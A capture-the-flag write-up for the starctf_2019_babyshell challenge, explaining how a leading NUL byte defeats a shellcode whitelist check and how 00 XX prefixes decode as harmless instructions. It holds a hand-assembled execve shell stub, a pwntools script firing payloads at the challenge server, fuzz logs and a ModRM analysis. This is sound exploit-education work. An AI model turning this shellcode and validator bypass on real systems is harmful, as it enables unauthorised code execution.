buuctf starctf_2019_babyshell

While doing challenges today I came across an interesting one: we supply shellcode, and once it satisfies a given condition it is executed. The usual approach is to piece shellcode together within those constraints, but there is a very neat trick online that bypasses the check altogether, after which pwntools' built-in shellcode gives a shell directly. This is a short note on that approach.

checksec

checksec starctf_2019_babyshell
[*] '/home/fuzz/Desktop/ctf/starctf_2019_babyshell'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Vulnerable function

The main function:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  _BYTE *buf; // [rsp+0h] [rbp-10h]

  sub_4007F8();
  buf = mmap(0LL, 0x1000uLL, 7, 34, 0, 0LL);
  puts("give me shellcode, plz:");
  read(0, buf, 0x200uLL);
  if ( !(unsigned int)sub_400786(buf) )
  {
    printf("wrong shellcode!");
    exit(0);
  }
  ((void (*)(void))buf)();
  return 0LL;
}

sub_4007F8() is just initialisation and can be ignored. sub_400786 checks that every byte of the shellcode appears in a whitelist string. Two details of main matter for what follows: mmap(0, 0x1000, 7, 34, 0, 0) maps a zero-filled anonymous private page with PROT_READ|PROT_WRITE|PROT_EXEC (7) and MAP_PRIVATE|MAP_ANONYMOUS (34 = 0x22), so the "NX enabled" from checksec is irrelevant here: the input is executed from that RWX page, not from the stack. And because read() stores at most 0x200 bytes into a 0x1000-byte zeroed page, the buffer always ends in NUL bytes, which is what the C-string walk in the check function below relies on.

__int64 __fastcall sub_400786(_BYTE *a1)
{
  const char *i; // [rsp+18h] [rbp-10h]

  while ( *a1 )
  {
    for ( i = aZzjLovesShellC; *i && *i != *a1; ++i )// ZZJ loves shell_code,and here is a gift:
      ;
    if ( !*i )
      return 0LL;
    ++a1;
  }
  return 1LL;
}

wp

Following the article "汇编语言中0x00的妙用" (the clever use of 0x00 in assembly), we can use a 0x00 byte to defeat the check. sub_400786 walks the input like a C string: while (*a1) stops at the first 0x00, so nothing from that byte onward is ever compared against the whitelist, and a buffer whose very first byte is 0x00 passes without a single comparison. The catch is that the CPU does not stop there: execution starts at the first byte of the buffer, so the 0x00 and the bytes that follow it must decode to an instruction that does not fault and is exactly as long as the bytes we prepend, so that the real shellcode begins on an instruction boundary and is executed unchanged.

link:https://blog.csdn.net/A951860555/article/details/120043354

The method in that article is to use pwn disasm to find suitable opcodes; 004200 is clearly not the only option. 0x00 is the opcode of add r/m8, r8 and the byte after it is a ModRM byte; 0x42 selects [rdx + disp8] with a one-byte displacement, so 00 42 00 is the three-byte instruction add BYTE PTR [rdx+0x0], al. It only adds al into one byte at rdx, which is harmless as long as rdx points to writable memory when buf() is called (the fuzz run below confirms that it does), and because the instruction is exactly three bytes long the shellcode placed after it is decoded from its first byte. The final payload is therefore just these three bytes followed by pwntools' shellcraft.sh() shellcode.

pwn disasm -c amd64 004200
   0:    00 42 00                 add    BYTE PTR [rdx+0x0],  al
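Before going to the remote, the bypass can be verified locally. The following Python is an added example written for this post (not code from the original write-up or the challenge): it ports sub_400786 to Python, uses only the part of the gift string visible in the decompiler comment (the binary's string may contain further bytes after the colon; that is an assumption here), and wraps a hand-assembled execve("/bin//sh") stub (not pwntools' output) with the 00 42 00 prefix to show that the wrapped payload passes the check while the bare stub does not.

```python
# Added example for this post (not code from the original write-up or the
# challenge binary): a Python model of sub_400786 showing why a NUL byte
# defeats the whitelist, plus the payload shape the write-up ends up with.

# Assumption: only the part of the "gift" string visible in the decompiler
# comment is modelled. The binary's string may carry more bytes after the colon.
GIFT = b"ZZJ loves shell_code,and here is a gift:"


def check_shellcode(buf, gift=GIFT):
    """Port of sub_400786: walk buf like a C string and require every byte
    before the first NUL to occur somewhere in gift."""
    for b in buf:
        if b == 0:
            return True          # `while (*a1)` ends here; later bytes are never looked at
        if b not in gift:
            return False         # inner loop ran off the end of gift: "wrong shellcode!"
    return True


def unchecked_tail(buf):
    """The bytes the CPU will execute that the check never inspected."""
    nul = buf.find(b"\x00")
    return b"" if nul < 0 else buf[nul:]


# Constructed 23-byte execve("/bin//sh", NULL, NULL) stub, hand-assembled for
# this example (not pwntools output):
#   xor rsi,rsi ; push rsi ; movabs rdi,"/bin//sh" ; push rdi ; push rsp ;
#   pop rdi ; push 0x3b ; pop rax ; cdq ; syscall
SH = (b"\x48\x31\xf6\x56"
      b"\x48\xbf/bin//sh"
      b"\x57\x54\x5f"
      b"\x6a\x3b\x58\x99\x0f\x05")

# 00 42 00 = add BYTE PTR [rdx+0x0], al: three bytes, starts with NUL, and
# only adds al into one byte at rdx, which points to writable memory at the call.
PREFIX = b"\x00\x42\x00"


def build_payload(shellcode, prefix=PREFIX):
    """Prepend a NUL-led harmless instruction so the check passes untouched."""
    if not prefix or prefix[0] != 0:
        raise ValueError("prefix must start with 0x00 to short-circuit the check")
    return prefix + shellcode


if __name__ == "__main__":
    payload = build_payload(SH)
    print("bare stub passes check:   ", check_shellcode(SH))            # False
    print("NUL-prefixed passes check:", check_shellcode(payload))       # True
    print("bytes never inspected:    ", len(unchecked_tail(payload)))  # 26
```

The point the model makes explicit: the validator and the consumer disagree about where the input ends. The check treats the buffer as a NUL-terminated string, while the CPU executes the whole buffer, so a single 0x00 byte lets every later byte escape inspection.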

To find out which bytes actually work, we can fuzz them with the following script. execve("/bin/ls") is used as the payload rather than a shell so that a successful run is visible as a directory listing containing "flag":

from pwn import *

context.arch = "amd64"
HOST, PORT = 'node5.buuoj.cn', 27030
success_list = []
# context(log_level='debug', arch='amd64', os='linux')

for first_byte in range(0x01, 0x100):
    # One fresh connection per candidate byte. The original loop closed the
    # connection after a hit but only reconnected in the except branch, so the
    # byte after every hit was never sent; that is why the two-byte result list
    # contains only even values in the 0xc0-0xfe range.
    p = remote(HOST, PORT)
    try:
        # 0x00 stops sub_400786 immediately; first_byte becomes the ModRM byte
        # of the resulting `add r/m8, r8` instruction in front of the shellcode.
        pay = bytes([0x00, first_byte]) + asm(shellcraft.execve("/bin/ls"))
        p.sendafter(b'plz:', pay)
        time.sleep(0.5)
        data2 = p.recvlines(10)
        print(f'data:{data2}')
        if b'flag' in data2:
            print(f'success:{hex(first_byte)}')
            success_list.append(hex(first_byte))
    except EOFError:
        pass            # the prefix faulted: the process died without any output
    finally:
        p.close()

print(f'success_list:{success_list}')

This gives the following result:

[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xca
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xcc
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xce
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xda
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xdc
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xde
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xea
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xec
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xee
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xfa
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xfc
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xfe
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done

success_list:['0x2', '0x6', '0xa', '0xe', '0x12', '0x16', '0x1a', '0x1e', '0x22', '0x26', '0x2a', '0x2e', '0x32', '0x36', '0x3a', '0x3e', '0xc0', '0xc2', '0xc4', '0xc6', '0xc8', '0xca', '0xcc', '0xce', '0xd0', '0xd2', '0xd4', '0xd6', '0xd8', '0xda', '0xdc', '0xde', '0xe0', '0xe2', '0xe4', '0xe6', '0xe8', '0xea', '0xec', '0xee', '0xf0', '0xf2', '0xf4', '0xf6', '0xf8', '0xfa', '0xfc', '0xfe']

Two observations on this list. Bytes 0x40 to 0xbf are absent because with mod=01 or mod=10 a displacement follows the ModRM byte, so a two-byte prefix would swallow the start of the shellcode; 0xc0 to 0xfe work because mod=11 encodes a register-to-register add that touches no memory. The odd values in that range (0xc1, 0xc3, ...) should work just as well, since they touch no memory either and the shellcode sets every register it uses: they are missing only because the loop that produced the list closed the connection after each hit and reconnected only in the except branch of the next iteration, so the byte after every hit was never actually sent. Now let's try the three-byte form, 00 XX 00, where the trailing 0x00 is the displacement byte of a [reg+disp8] operand:

pay=bytes([0x00,first_byte, 0x00]) + asm(shellcraft.execve("/bin/ls"))

This gives the following result:

data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x42
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x45
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x46
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x47
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4f
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x52
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x55
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x56
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x57
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5f
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x62
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x65
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x66
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x67
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6f
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x72
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x75
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x76
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x77
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7f
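Both result lists can be reproduced without touching the remote by decoding the ModRM byte that follows opcode 0x00. The following Python is an added analysis example for this post, not part of the original fuzz script. The set of registers assumed to point at writable memory when buf() is called (rdx, rsi, rdi and rbp) is taken from the successful bytes above and is an assumption, not something read out of the binary. For the three-byte form it predicts exactly the observed list (mod=01 with rm selecting rdx, rbp, rsi or rdi: 0x42, 0x45, 0x46, 0x47, then the same pattern every eight bytes); for the two-byte form it predicts every observed byte plus 40 more that the fuzz loop never sent, all of them odd.

```python
# Added analysis example for this post: predict which `00 XX` and `00 XX 00`
# prefixes survive by decoding the ModRM byte after opcode 0x00 (add r/m8, r8).
# Not part of the original fuzz script.

RM_NAMES = ["rax", "rcx", "rdx", "rbx", "SIB", "rbp", "rsi", "rdi"]

# Assumption (taken from the fuzz hits on the page, not from the binary): when
# buf() is called, these base registers point into writable memory.
WRITABLE_BASES = {"rdx", "rsi", "rdi", "rbp"}

# The lists the two fuzz runs on the page actually produced.
OBSERVED_2 = list(range(0x02, 0x40, 4)) + list(range(0xc0, 0x100, 2))
OBSERVED_3 = [
    0x42, 0x45, 0x46, 0x47, 0x4a, 0x4d, 0x4e, 0x4f,
    0x52, 0x55, 0x56, 0x57, 0x5a, 0x5d, 0x5e, 0x5f,
    0x62, 0x65, 0x66, 0x67, 0x6a, 0x6d, 0x6e, 0x6f,
    0x72, 0x75, 0x76, 0x77, 0x7a, 0x7d, 0x7e, 0x7f,
]


def decode_modrm(modrm):
    """Split a ModRM byte into its (mod, reg, rm) fields."""
    return modrm >> 6, (modrm >> 3) & 7, modrm & 7


def prefix_length(modrm):
    """Byte length of `00 <modrm> [disp]` without a REX prefix, or None when a
    SIB byte would follow (rm=100), a shape not modelled here."""
    mod, _, rm = decode_modrm(modrm)
    if mod == 3:
        return 2                     # register-direct, no displacement
    if rm == 4:
        return None                  # SIB byte follows
    if mod == 0:
        return 6 if rm == 5 else 2   # mod=00, rm=101 is [rip + disp32]
    if mod == 1:
        return 3                     # disp8
    return 6                         # mod=10: disp32


def is_safe_prefix(modrm, writable=WRITABLE_BASES):
    """True when the prefix executes without faulting under the assumptions above."""
    mod, _, rm = decode_modrm(modrm)
    if mod == 3:
        return True                  # add reg8, reg8: touches no memory
    if rm == 4:
        return False                 # SIB form: not modelled
    if mod == 0 and rm == 5:
        return False                 # [rip+disp32] with the shellcode as displacement
    return RM_NAMES[rm] in writable


def predict(total_len):
    """ModRM bytes whose prefix is exactly total_len bytes (with zero
    displacement bytes, as in the fuzz payloads) and predicted safe."""
    return sorted(m for m in range(256)
                  if prefix_length(m) == total_len and is_safe_prefix(m))


def missed_by_fuzz(total_len, observed):
    """Predicted-safe bytes the fuzz run never reported."""
    return sorted(set(predict(total_len)) - set(observed))


def unexplained(total_len, observed):
    """Observed hits the model does not predict (should be empty)."""
    return sorted(set(observed) - set(predict(total_len)))


if __name__ == "__main__":
    for n, obs in ((2, OBSERVED_2), (3, OBSERVED_3)):
        print(f"{n}-byte prefixes: predicted {len(predict(n))}, observed {len(obs)}, "
              f"missed {[hex(m) for m in missed_by_fuzz(n, obs)]}, "
              f"unexplained {[hex(m) for m in unexplained(n, obs)]}")
```

The model is deliberately minimal (no REX prefixes, no SIB forms), which is enough for the single-opcode case here; the useful habit it encodes is to work out the instruction length and memory operand of a candidate prefix before fuzzing, so that a remote run confirms a prediction instead of replacing one.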